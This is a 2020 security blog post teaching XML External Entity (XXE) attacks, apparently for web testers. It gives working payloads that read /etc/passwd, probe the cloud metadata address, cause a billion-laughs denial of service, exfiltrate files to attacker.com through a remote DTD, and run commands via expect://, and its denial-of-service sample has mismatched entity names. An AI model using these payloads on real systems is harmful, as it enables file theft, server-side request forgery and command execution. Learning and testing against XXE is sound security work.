XXE

XXE

Posted by D on January 13, 2020

XML & DTD quick intro

What is XML

  • eXtensible Markup Language
  • Structured syntax
  • Designed to be human readable as well as machine readable

example:

<?xml version = "1.0" encoding = "utf-8"?>
<plane>
	<year> 1977 </year>
	<make> Cessna </make>
</plane>

DTD

  • Document Type Definition
  • Used for defining XML document structure
  • Can also defined outside of the XML file(External)
<!DOCTYPE root-element [element-declarations]>

types of entities:

  • Internal entity 
    <!ENTITY foo "bar">

    This entity can be referred within the XML as &foo; and it will be replaced with the term “bar”.

  • External entity 
    <!ENTITY foo SYSTEM "file:///external.dtd">

    We are mostly interested in the External entities.

  • Parammeter 
    <!ENTITY % name "entity_value">

    Used with % symbol

Introduction to XXE

Types of attacks

1.Classic XXE

example:

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE foo[<!ENTITY xxe "thisistest">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John thisistest

This is not a vulnerability yet!

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE foo[<!ENTITY xxe SYSTEM  "file:///etc/passwd">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John root:x:0:0:root
...
....[SNIP]

Now it is.

2.Server Side Request Forgery

example:

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE foo[<!ENTITY xxe SYSTEM  "http://169.254.169.254">]>
<userInfo>
	<firstName>John</firstName>
	<lastName>&xxe;</lastName>
</userInfo>

Output:
Hello John 1.0
2007-01-09
2007-03-01
...
....[SNIP]

3.Denial of Service

example:

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE lolz[<!ENTITY log "log"><!ENTITY lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol4 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol5 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol6 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol7 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol8 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol9 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>
<tag>&lol9;</tag>

4.Advanced XXE

example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data[<!ENTITY % remote SYSTEM "http://attacker.com/call.dtd">%remote;]>

Parameter entities are special type of entities that can be used only withina DTD itself. Tip:Use this payload to check for XXE vulnerabilities when user input is not reflected back on the page or in the response.

  • Also know as Blind XXE
  • Out of band data exfiltration The payload to upload/send
<!DOCTYPE roottag[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/host.dtd">
%dtd;]>
<roottag>&send;</roottag>

Content of host.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/collect.php?file=%file;'>">
%all;

5.Remote Code Execution

In some rare cases XXE can be elevated to execute system commands on the server expect:// awesomeness! expect:// is a PHP wrapper that can provide access to stdio, stdout and stderr. In short, it can execute commands! Sample payload :

<!DOCTYPE replace [<!ENTITY ent SYSTEM "expect://whoami"> ]>

https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7

Common places to find XXE

  • XML file upload(e.g config files)
  • XML input fields
  • XML based APIs
  • XML based files(RSS,SVG)

    uncommon places to find XXE

  • MS Office files(docx,xlsx,etc.)
  • SAML-based SSO
  • VoiceXML in IVR systems
  • Online Map editors using KML

Tools

  • Xxeserv A mini webserver with FTP support for XXE payloads

  • oxml_xxe A tool for embedding XXE/XML exploits into different filetypes

Labs

https://github.com/jbarone/xxelab

Resource and References

https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html <https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Preve ntion_Cheat_Sheet.html> https://github.com/jbarone/xxelab http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

:
CATALOG
    FEATURED TAGS
    shadowsocks v2ray Broken Access Control XSS Recon linux_basic SecTools git Freedom psychology health web hacking food FastDFS nginx MySQL FreeBSD NTP authentication freebsd acme.sh let's encrypt